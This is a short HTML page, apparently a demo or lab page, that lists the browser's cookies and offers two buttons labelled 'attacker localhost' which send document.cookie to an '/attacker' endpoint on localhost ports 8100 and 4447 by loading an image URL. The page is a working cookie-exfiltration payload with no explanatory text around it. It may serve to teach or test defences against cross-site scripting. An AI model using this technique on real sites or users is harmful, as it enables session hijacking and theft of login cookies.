<html>
	<head><title>Wellcome</title></head>

	
	<script>
		function listCookies(){
			var theCookies=document.cookie.split(';');
			var aString='';
			for(var i=1; i<=theCookies.length; i++){
				aString += i + '-> ' + theCookies[i-1] + '  '
			}
			return aString;
		}
	</script>
	<body>
	
	<p><button onclick=alert(listCookies())>Click here to see the cookies.</button></p>
	
	<form>
		<input type="button" onclick="var image = document.getElementById('the-image2'); image.src='http://localhost:8100/attacker?text=' + escape(document.cookie);" value="attacker localhost">
	</form>
	<img id="the-image2">
	
	<form>
		<input type="button" onclick="var image = document.getElementById('the-image3'); image.src='https://localhost:4447/attacker?text=' + escape(document.cookie);" value="attacker localhost ssl">
	</form>
	<img id="the-image3">

	
	</body>
</html>




